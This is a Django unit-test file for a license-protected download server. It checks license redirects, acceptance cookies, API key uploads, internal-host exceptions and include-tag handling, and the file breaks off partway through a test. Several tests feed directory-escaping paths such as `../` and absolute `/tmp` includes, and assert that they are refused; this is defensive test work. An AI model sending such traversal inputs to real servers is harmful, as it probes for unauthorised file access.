b2d0cd30b7658735f914c29e401a670d9bb42f92
|
[
"Net-SNMP",
"Xnet",
"Info-ZIP",
"OML"
] | null | null | null |
license_protected_downloads/tests/test_views.py
|
NexellCorp/infrastructure_server_fileserver
|
b2d0cd30b7658735f914c29e401a670d9bb42f92
|
[
"Net-SNMP",
"Xnet",
"Info-ZIP",
"OML"
] | null | null | null |
__author__ = 'dooferlad'
import hashlib
import os
import tempfile
import unittest
import urllib2
import urlparse
import json
import random
import shutil
import mock
from django.conf import settings
from django.test import Client, TestCase
from django.http import HttpResponse
from license_protected_downloads.buildinfo import BuildInfo
from license_protected_downloads.config import INTERNAL_HOSTS
from license_protected_downloads.models import APIKeyStore
from license_protected_downloads.tests.helpers import temporary_directory
from license_protected_downloads.tests.helpers import TestHttpServer
from license_protected_downloads.views import _insert_license_into_db
from license_protected_downloads.views import _process_include_tags
from license_protected_downloads.views import _sizeof_fmt
from license_protected_downloads.views import is_same_parent_dir
from license_protected_downloads import views
THIS_DIRECTORY = os.path.dirname(os.path.abspath(__file__))
TESTSERVER_ROOT = os.path.join(THIS_DIRECTORY, "testserver_root")
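# Every test below serves files out of the checked-in testserver_root tree,
# so responses can be asserted against real on-disk fixtures.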
class BaseServeViewTest(TestCase):
def setUp(self):
self.client = Client()
self.old_served_paths = settings.SERVED_PATHS
settings.SERVED_PATHS = [os.path.join(THIS_DIRECTORY,
"testserver_root")]
self.old_upload_path = settings.UPLOAD_PATH
settings.UPLOAD_PATH = os.path.join(THIS_DIRECTORY,
"test_upload_root")
if not os.path.isdir(settings.UPLOAD_PATH):
os.makedirs(settings.UPLOAD_PATH)
self.old_master_api_key = settings.MASTER_API_KEY
settings.MASTER_API_KEY = "1234abcd"
def tearDown(self):
settings.SERVED_PATHS = self.old_served_paths
settings.MASTER_API_KEY = self.old_master_api_key
os.rmdir(settings.UPLOAD_PATH)
settings.UPLOAD_PATH = self.old_upload_path
class ViewTests(BaseServeViewTest):
def test_license_directly(self):
response = self.client.get('/licenses/license.html', follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, '/build-info')
def test_licensefile_directly_samsung(self):
response = self.client.get('/licenses/samsung.html', follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, '/build-info')
def test_licensefile_directly_ste(self):
response = self.client.get('/licenses/ste.html', follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, '/build-info')
def test_licensefile_directly_linaro(self):
response = self.client.get('/licenses/linaro.html', follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, '/build-info')
def test_redirect_to_license_samsung(self):
# Get BuildInfo for target file
target_file = "build-info/origen-blob.txt"
file_path = os.path.join(TESTSERVER_ROOT, target_file)
build_info = BuildInfo(file_path)
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
digest = hashlib.md5(build_info.get("license-text")).hexdigest()
self.assertRedirects(response, '/license?lic=%s&url=%s' %
(digest, target_file))
# Make sure that we get the license text in the license page
self.assertContains(response, build_info.get("license-text"))
# Test that we use the "samsung" theme. This contains exynos.png
self.assertContains(response, "exynos.png")
def test_redirect_to_license_ste(self):
# Get BuildInfo for target file
target_file = "build-info/snowball-blob.txt"
file_path = os.path.join(TESTSERVER_ROOT, target_file)
build_info = BuildInfo(file_path)
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
digest = hashlib.md5(build_info.get("license-text")).hexdigest()
self.assertRedirects(response, '/license?lic=%s&url=%s' %
(digest, target_file))
# Make sure that we get the license text in the license page
self.assertContains(response, build_info.get("license-text"))
# Test that we use the "stericsson" theme. This contains igloo.png
self.assertContains(response, "igloo.png")
def test_redirect_to_license_linaro(self):
# Get BuildInfo for target file
target_file = "build-info/linaro-blob.txt"
file_path = os.path.join(TESTSERVER_ROOT, target_file)
build_info = BuildInfo(file_path)
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
digest = hashlib.md5(build_info.get("license-text")).hexdigest()
self.assertRedirects(response, '/license?lic=%s&url=%s' %
(digest, target_file))
# Make sure that we get the license text in the license page
self.assertContains(response, build_info.get("license-text"))
# Test that we use the "linaro" theme. This contains linaro.png
self.assertContains(response, "linaro.png")
def set_up_license(self, target_file, index=0):
# Get BuildInfo for target file
file_path = os.path.join(TESTSERVER_ROOT, target_file)
build_info = BuildInfo(file_path)
# Insert license information into database
text = build_info.get("license-text", index)
digest = hashlib.md5(text).hexdigest()
theme = build_info.get("theme", index)
_insert_license_into_db(digest, text, theme)
return digest
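    # The md5 digest of the license text doubles as its lookup key: it shows
    # up in the redirect URL (?lic=<digest>) and in the
    # "license_accepted_<digest>" cookie the download views check.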
def test_redirect_to_file_on_accept_license(self):
target_file = "build-info/linaro-blob.txt"
digest = self.set_up_license(target_file)
# Accept the license for our file...
accept_url = '/accept-license?lic=%s&url=%s' % (digest, target_file)
response = self.client.post(accept_url, {"accept": "accept"})
# We should have a license accept cookie.
accept_cookie_name = "license_accepted_" + digest
self.assertTrue(accept_cookie_name in response.cookies)
# We should get redirected back to the original file location.
self.assertEqual(response.status_code, 302)
url = urlparse.urljoin("http://testserver/", target_file)
listing_url = os.path.dirname(url)
self.assertEqual(response['Location'],
listing_url + "?dl=/" + target_file)
def test_redirect_to_decline_page_on_decline_license(self):
target_file = "build-info/linaro-blob.txt"
digest = self.set_up_license(target_file)
# Reject the license for our file...
accept_url = '/accept-license?lic=%s&url=%s' % (digest, target_file)
response = self.client.post(accept_url, {"reject": "reject"})
# We should get a message saying we don't have access to the file.
self.assertContains(response, "Without accepting the license, you can"
" not download the requested files.")
def test_download_file_accepted_license(self):
target_file = "build-info/linaro-blob.txt"
url = urlparse.urljoin("http://testserver/", target_file)
digest = self.set_up_license(target_file)
# Accept the license for our file...
accept_url = '/accept-license?lic=%s&url=%s' % (digest, target_file)
response = self.client.post(accept_url, {"accept": "accept"})
# We should get redirected back to the original file location.
self.assertEqual(response.status_code, 302)
listing_url = os.path.dirname(url)
self.assertEqual(response['Location'],
listing_url + "?dl=/" + target_file)
# We should have a license accept cookie.
accept_cookie_name = "license_accepted_" + digest
self.assertTrue(accept_cookie_name in response.cookies)
# XXX Workaround for seemingly out of sync cookie handling XXX
# The cookies in client.cookies are instances of
# http://docs.python.org/library/cookie.html once they have been
# returned by a client get/post. Unfortunately for the next query
# client.cookies needs to be a dictionary keyed by cookie name and
# containing a value of whatever is stored in the cookie (or so it
# seems). For this reason we start up a new client, erasing all
# cookies from the current session, and re-introduce them.
client = Client()
client.cookies[accept_cookie_name] = accept_cookie_name
response = client.get(url)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_api_get_license_list(self):
target_file = "build-info/snowball-blob.txt"
digest = self.set_up_license(target_file)
license_url = "/api/license/" + target_file
# Download JSON containing license information
response = self.client.get(license_url)
data = json.loads(response.content)["licenses"]
# Extract digests
digests = [d["digest"] for d in data]
# Make sure digests match what is in the database
self.assertIn(digest, digests)
self.assertEqual(len(digests), 1)
def test_api_get_license_list_multi_license(self):
target_file = "build-info/multi-license.txt"
digest_1 = self.set_up_license(target_file)
digest_2 = self.set_up_license(target_file, 1)
license_url = "/api/license/" + target_file
# Download JSON containing license information
response = self.client.get(license_url)
data = json.loads(response.content)["licenses"]
# Extract digests
digests = [d["digest"] for d in data]
# Make sure digests match what is in the database
self.assertIn(digest_1, digests)
self.assertIn(digest_2, digests)
self.assertEqual(len(digests), 2)
def test_api_get_license_list_404(self):
target_file = "build-info/snowball-b"
license_url = "/api/license/" + target_file
# Download JSON containing license information
response = self.client.get(license_url)
self.assertEqual(response.status_code, 404)
def test_api_download_file(self):
target_file = "build-info/snowball-blob.txt"
digest = self.set_up_license(target_file)
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True,
HTTP_LICENSE_ACCEPTED=digest)
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
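    # Note: HTTP_LICENSE_ACCEPTED is the WSGI-style spelling of a
    # "License-Accepted: <digest>" request header, so the equivalent
    # command-line request would be roughly (illustrative only):
    #   curl -H 'License-Accepted: <digest>' http://server/<target_file>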
def test_api_download_file_multi_license(self):
target_file = "build-info/multi-license.txt"
digest_1 = self.set_up_license(target_file)
digest_2 = self.set_up_license(target_file, 1)
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(
url, follow=True,
HTTP_LICENSE_ACCEPTED=" ".join([digest_1, digest_2]))
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_api_download_file_404(self):
target_file = "build-info/snowball-blob.txt"
digest = self.set_up_license(target_file)
url = urlparse.urljoin("http://testserver/", target_file[:-2])
response = self.client.get(url, follow=True,
HTTP_LICENSE_ACCEPTED=digest)
self.assertEqual(response.status_code, 404)
def test_api_get_listing(self):
url = "/api/ls/build-info"
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)["files"]
# For each file listed, check some key attributes
for file_info in data:
file_path = os.path.join(TESTSERVER_ROOT,
file_info["url"].lstrip("/"))
if file_info["type"] == "folder":
self.assertTrue(os.path.isdir(file_path))
else:
self.assertTrue(os.path.isfile(file_path))
mtime = os.path.getmtime(file_path)
self.assertEqual(mtime, file_info["mtime"])
def test_api_get_listing_single_file(self):
url = "/api/ls/build-info/snowball-blob.txt"
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)["files"]
# Should be a listing for a single file
self.assertEqual(len(data), 1)
# For each file listed, check some key attributes
for file_info in data:
file_path = os.path.join(TESTSERVER_ROOT,
file_info["url"].lstrip("/"))
if file_info["type"] == "folder":
self.assertTrue(os.path.isdir(file_path))
else:
self.assertTrue(os.path.isfile(file_path))
mtime = os.path.getmtime(file_path)
self.assertEqual(mtime, file_info["mtime"])
def test_api_get_listing_404(self):
url = "/api/ls/buld-info"
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_OPEN_EULA_txt(self):
target_file = '~linaro-android/staging-vexpress-a9/test.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_never_available_dirs(self):
target_file = '~linaro-android/staging-imx53/test.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If we don't have access we will get a Forbidden response (403)
self.assertEqual(response.status_code, 403)
def test_protected_by_EULA_txt(self):
# Get BuildInfo for target file
target_file = "~linaro-android/staging-origen/test.txt"
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
eula_path = os.path.join(settings.PROJECT_ROOT,
"templates/licenses/samsung.txt")
with open(eula_path) as license_file:
license_text = license_file.read()
digest = hashlib.md5(license_text).hexdigest()
self.assertRedirects(response, "/license?lic=%s&url=%s" %
(digest, target_file))
# Make sure that we get the license text in the license page
self.assertContains(response, license_text)
# Test that we use the "samsung" theme. This contains exynos.png
self.assertContains(response, "exynos.png")
@mock.patch('license_protected_downloads.views.config')
def test_protected_internal_file(self, config):
'''ensure a protected file can be downloaded by an internal host'''
config.INTERNAL_HOSTS = ('127.0.0.1',)
target_file = "~linaro-android/staging-origen/test.txt"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertIn('X-Sendfile', response)
@mock.patch('license_protected_downloads.views.config')
def test_protected_internal_listing(self, config):
'''ensure directory listings are browseable for internal hosts'''
config.INTERNAL_HOSTS = ('127.0.0.1',)
response = self.client.get('http://testserver/')
self.assertIn('linaro-license-protection.git/commit', response.content)
def test_per_file_license_samsung(self):
# Get BuildInfo for target file
target_file = "images/origen-blob.txt"
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
eula_path = os.path.join(settings.PROJECT_ROOT,
"templates/licenses/samsung.txt")
with open(eula_path) as license_file:
license_text = license_file.read()
digest = hashlib.md5(license_text).hexdigest()
self.assertRedirects(response, "/license?lic=%s&url=%s" %
(digest, target_file))
# Make sure that we get the license text in the license page
self.assertContains(response, license_text)
# Test that we use the "samsung" theme. This contains exynos.png
self.assertContains(response, "exynos.png")
def test_per_file_non_protected_dirs(self):
target_file = "images/MANIFEST"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_dir_containing_only_dirs(self):
target_file = "~linaro-android"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
        # A directory listing should render the standard table header.
self.assertContains(
response,
r"<th></th><th>Name</th><th>Last modified</th>"
"<th>Size</th><th>License</th>")
def test_not_found_file(self):
target_file = "12qwaszx"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
self.assertContains(response, "not found", status_code=404)
def test_unprotected_BUILD_INFO(self):
target_file = 'build-info/panda-open.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_redirect_to_file_on_accept_multi_license(self):
target_file = "build-info/multi-license.txt"
digest = self.set_up_license(target_file)
# Accept the first license for our file...
accept_url = '/accept-license?lic=%s&url=%s' % (digest, target_file)
response = self.client.post(accept_url, {"accept": "accept"})
# We should have a license accept cookie.
accept_cookie_name = "license_accepted_" + digest
self.assertTrue(accept_cookie_name in response.cookies)
# We should get redirected back to the original file location.
self.assertEqual(response.status_code, 302)
url = urlparse.urljoin("http://testserver/", target_file)
listing_url = os.path.dirname(url)
self.assertEqual(
response['Location'], listing_url + "?dl=/" + target_file)
client = Client()
client.cookies[accept_cookie_name] = accept_cookie_name
digest = self.set_up_license(target_file, 1)
# Accept the second license for our file...
accept_url = '/accept-license?lic=%s&url=%s' % (digest, target_file)
response = client.post(accept_url, {"accept": "accept"})
# We should have a license accept cookie.
accept_cookie_name1 = "license_accepted_" + digest
self.assertTrue(accept_cookie_name1 in response.cookies)
# We should get redirected back to the original file location.
self.assertEqual(response.status_code, 302)
url = urlparse.urljoin("http://testserver/", target_file)
listing_url = os.path.dirname(url)
self.assertEqual(
response['Location'], listing_url + "?dl=/" + target_file)
client = Client()
client.cookies[accept_cookie_name] = accept_cookie_name
client.cookies[accept_cookie_name1] = accept_cookie_name1
response = client.get(url)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_header_html(self):
target_file = "~linaro-android"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
self.assertContains(
response, r"Welcome to the Linaro releases server")
def test_exception_internal_host_for_lic(self):
internal_host = INTERNAL_HOSTS[0]
target_file = 'build-info/origen-blob.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(
url, follow=True, REMOTE_ADDR=internal_host)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_exception_internal_host_for_openid(self):
internal_host = INTERNAL_HOSTS[0]
target_file = 'build-info/openid.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(
url, follow=True, REMOTE_ADDR=internal_host)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_exception_internal_host_for_lic_and_openid(self):
internal_host = INTERNAL_HOSTS[0]
target_file = 'build-info/origen-blob-openid.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(
url, follow=True, REMOTE_ADDR=internal_host)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_no_exception_ip(self):
internal_host = '10.1.2.3'
target_file = 'build-info/origen-blob.txt'
file_path = os.path.join(TESTSERVER_ROOT, target_file)
build_info = BuildInfo(file_path)
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(
url, follow=True, REMOTE_ADDR=internal_host)
digest = hashlib.md5(build_info.get("license-text")).hexdigest()
self.assertRedirects(response, '/license?lic=%s&url=%s' %
(digest, target_file))
# Make sure that we get the license text in the license page
self.assertContains(response, build_info.get("license-text"))
# Test that we use the "samsung" theme. This contains exynos.png
self.assertContains(response, "exynos.png")
def test_broken_build_info_directory(self):
target_file = "build-info/broken-build-info"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If a build-info file is invalid, we don't allow access
self.assertEqual(response.status_code, 403)
def test_broken_build_info_file(self):
target_file = "build-info/broken-build-info/test.txt"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If a build-info file is invalid, we don't allow access
self.assertEqual(response.status_code, 403)
def test_unable_to_download_hidden_files(self):
target_file = '~linaro-android/staging-vexpress-a9/OPEN-EULA.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
        # This file exists, but isn't listed, so we shouldn't be able to
        # download it.
self.assertEqual(response.status_code, 404)
def test_partial_build_info_file_open(self):
target_file = ("partial-license-settings/"
"partially-complete-build-info/"
"should_be_open.txt")
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
        # The build-info file marks this file as open, so access is allowed.
self.assertEqual(response.status_code, 200)
def test_partial_build_info_file_protected(self):
target_file = ("partial-license-settings/"
"partially-complete-build-info/"
"should_be_protected.txt")
file_path = os.path.join(TESTSERVER_ROOT, target_file)
build_info = BuildInfo(file_path)
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
digest = hashlib.md5(build_info.get("license-text")).hexdigest()
self.assertRedirects(response, '/license?lic=%s&url=%s' %
(digest, target_file))
def test_partial_build_info_file_unspecified(self):
target_file = ("partial-license-settings/"
"partially-complete-build-info/"
"should_be_inaccessible.txt")
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
        # If the build-info file has no entry for this file, access is denied.
self.assertEqual(response.status_code, 403)
def test_listings_do_not_contain_double_slash_in_link(self):
target_file = 'images/'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# this link should not contain a double slash:
self.assertNotContains(response, "//origen-blob.txt")
def test_directory_with_broken_symlink(self):
target_file = 'broken-symlinks'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
        # Rendering the listing must not raise despite the broken symlink;
        # a 200 response is a pass.
self.assertEqual(response.status_code, 200)
def test_sizeof_fmt(self):
self.assertEqual(_sizeof_fmt(1), '1')
self.assertEqual(_sizeof_fmt(1234), '1.2K')
self.assertEqual(_sizeof_fmt(1234567), '1.2M')
self.assertEqual(_sizeof_fmt(1234567899), '1.1G')
self.assertEqual(_sizeof_fmt(1234567899999), '1.1T')
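    # A minimal sketch of the behaviour the assertions above pin down.
    # (_sizeof_fmt_sketch is a hypothetical stand-in; the real _sizeof_fmt
    # is imported at module level and may differ in detail.)
    @staticmethod
    def _sizeof_fmt_sketch(num):
        for unit in ['', 'K', 'M', 'G']:
            if num < 1024:
                return ('%.1f' % num).rstrip('0').rstrip('.') + unit
            num /= 1024.0
        return ('%.1f' % num).rstrip('0').rstrip('.') + 'T'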
def test_listdir(self):
patterns = [
(['b', 'a', 'latest', 'c'], ['latest', 'a', 'b', 'c']),
(['10', '1', '100', 'latest'], ['latest', '1', '10', '100']),
(['10', 'foo', '100', 'latest'], ['latest', '10', '100', 'foo']),
]
for files, expected in patterns:
path = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, path)
for file in files:
with open(os.path.join(path, file), 'w') as f:
f.write(file)
self.assertEqual(expected, views._listdir(path))
def test_whitelisted_dirs(self):
target_file = "precise/restricted/whitelisted.txt"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
    def make_temporary_file(self, data, root=None):
        """Create a temporary file and fill it with data.
        Return the base name of the new temporary file.
        """
tmp_file_handle, tmp_filename = tempfile.mkstemp(dir=root)
tmp_file = os.fdopen(tmp_file_handle, "w")
tmp_file.write(data)
tmp_file.close()
self.addCleanup(os.unlink, tmp_filename)
return os.path.basename(tmp_filename)
def test_replace_self_closing_tag(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="README" /> html')
self.assertEqual(ret, r"Test Included from README html")
os.chdir(old_cwd)
def test_replace_self_closing_tag1(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="README"/> html')
self.assertEqual(ret, r"Test Included from README html")
os.chdir(old_cwd)
def test_replace_with_closing_tag(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="README">README is missing'
'</linaro:include> html')
self.assertEqual(ret, r"Test Included from README html")
os.chdir(old_cwd)
def test_replace_non_existent_file(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="NON_EXISTENT_FILE" /> html')
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_replace_empty_file_property(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="" /> html')
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_replace_parent_dir(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="../README" /> html')
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_replace_subdir(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="subdir/README" /> html')
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_replace_subdir_parent_dir(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="subdir/../README" /> html')
self.assertEqual(ret, r"Test Included from README html")
os.chdir(old_cwd)
def test_replace_full_path(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
tmp = self.make_temporary_file("Included from /tmp", root="/tmp")
ret = _process_include_tags(
'Test <linaro:include file="/tmp/%s" /> html' % tmp)
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_replace_self_dir(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="./README" /> html')
self.assertEqual(ret, r"Test Included from README html")
os.chdir(old_cwd)
def test_replace_self_parent_dir(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="./../README" /> html')
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_replace_symlink(self):
target_file = "readme"
old_cwd = os.getcwd()
file_path = os.path.join(TESTSERVER_ROOT, target_file)
os.chdir(file_path)
ret = _process_include_tags(
'Test <linaro:include file="READMELINK" /> html')
self.assertEqual(ret, r"Test html")
os.chdir(old_cwd)
def test_process_include_tags(self):
target_file = "readme"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
self.assertContains(response, r"Included from README")
def test_is_same_parent_dir_true(self):
fname = os.path.join(TESTSERVER_ROOT, "subdir/../file")
self.assertTrue(is_same_parent_dir(TESTSERVER_ROOT, fname))
def test_is_same_parent_dir_false(self):
fname = os.path.join(TESTSERVER_ROOT, "../file")
self.assertFalse(is_same_parent_dir(TESTSERVER_ROOT, fname))
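    # A minimal sketch of the check the two tests above exercise
    # (hypothetical re-implementation; the real is_same_parent_dir is
    # imported at module level and may normalise paths differently):
    @staticmethod
    def _is_same_parent_dir_sketch(root, path):
        real_root = os.path.realpath(root)
        return real_root == os.path.realpath(os.path.dirname(path))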
def test_get_remote_static_unsupported_file(self):
response = self.client.get('/get-remote-static?name=unsupported.css')
self.assertEqual(response.status_code, 404)
def test_get_remote_static_nonexisting_file(self):
pages = {"/": "index"}
with TestHttpServer(pages) as http_server:
css_url = '%s/init.css' % http_server.base_url
settings.SUPPORTED_REMOTE_STATIC_FILES = {
'init.css': css_url}
self.assertRaises(urllib2.HTTPError, self.client.get,
'/get-remote-static?name=init.css')
def test_get_remote_static(self):
pages = {"/": "index", "/init.css": "test CSS"}
with TestHttpServer(pages) as http_server:
css_url = '%s/init.css' % http_server.base_url
settings.SUPPORTED_REMOTE_STATIC_FILES = {
'init.css': css_url}
response = self.client.get('/get-remote-static?name=init.css')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'test CSS')
def test_path_to_root(self):
response = self.client.get("http://testserver//", follow=True)
# Shouldn't be able to escape served paths...
self.assertEqual(response.status_code, 404)
def test_path_to_dir_above(self):
response = self.client.get("http://testserver/../", follow=True)
# Shouldn't be able to escape served paths...
self.assertEqual(response.status_code, 404)
def test_path_to_dir_above2(self):
response = self.client.get("http://testserver/..", follow=True)
# Shouldn't be able to escape served paths...
self.assertEqual(response.status_code, 404)
def test_get_key(self):
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY})
self.assertEqual(response.status_code, 200)
# Don't care what the key is, as long as it isn't blank
        self.assertRegexpMatches(response.content, r"\S+")
def test_get_key_api_disabled(self):
settings.MASTER_API_KEY = ""
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY})
self.assertEqual(response.status_code, 403)
def test_get_key_post_and_get_file(self):
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY})
self.assertEqual(response.status_code, 200)
# Don't care what the key is, as long as it isn't blank
        self.assertRegexpMatches(response.content, r"\S+")
key = response.content
last_used = APIKeyStore.objects.get(key=key).last_used
# Now write a file so we can upload it
file_content = "test_get_key_post_and_get_file"
file_root = "/tmp"
tmp_file_name = os.path.join(
file_root,
self.make_temporary_file(file_content))
try:
# Send the file
with open(tmp_file_name) as f:
response = self.client.post(
"http://testserver/file_name",
data={"key": key, "file": f})
self.assertEqual(response.status_code, 200)
# Check the upload worked by reading the file back from its
# uploaded location
uploaded_file_path = os.path.join(
settings.UPLOAD_PATH, key, "file_name")
with open(uploaded_file_path) as f:
self.assertEqual(f.read(), file_content)
# Test we can fetch the newly uploaded file if we present the key
response = self.client.get("http://testserver/file_name",
data={"key": key})
self.assertEqual(response.status_code, 200)
response = self.client.get("http://testserver/file_name")
self.assertNotEqual(response.status_code, 200)
self.assertNotEqual(
APIKeyStore.objects.get(key=key).last_used, last_used)
finally:
# Delete the files generated by the test
shutil.rmtree(os.path.join(settings.UPLOAD_PATH, key))
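    # For reference, the same round trip driven from outside the test suite
    # would look roughly like this with the 'requests' library (assumed
    # here purely for illustration, it is not used by this suite):
    #   key = requests.get(server + '/api/request_key',
    #                      params={'key': MASTER_API_KEY}).text
    #   with open('build.tar.bz2', 'rb') as f:
    #       requests.post(server + '/build.tar.bz2',
    #                     data={'key': key}, files={'file': f})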
def test_get_public_key_post_and_get_file(self):
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY,
"public": ""})
self.assertEqual(response.status_code, 200)
# Don't care what the key is, as long as it isn't blank
        self.assertRegexpMatches(response.content, r"\S+")
key = response.content
# Now write a file so we can upload it
file_content = "test_get_key_post_and_get_file"
file_root = "/tmp"
tmp_file_name = os.path.join(
file_root,
self.make_temporary_file(file_content))
buildinfo_content = "\n".join([
"Format-Version: 0.1",
"Files-Pattern: *",
"Build-Name: test",
"License-Type: open"])
tmp_build_info = os.path.join(
file_root,
self.make_temporary_file(buildinfo_content))
try:
# Send the files
with open(tmp_file_name) as f:
response = self.client.post(
"http://testserver/pub/file_name",
data={"key": key, "file": f})
self.assertEqual(response.status_code, 200)
with open(tmp_build_info) as f:
response = self.client.post(
"http://testserver/pub/BUILD-INFO.txt",
data={"key": key, "file": f})
self.assertEqual(response.status_code, 200)
# Check the upload worked by reading the file back from its
# uploaded location
uploaded_file_path = os.path.join(
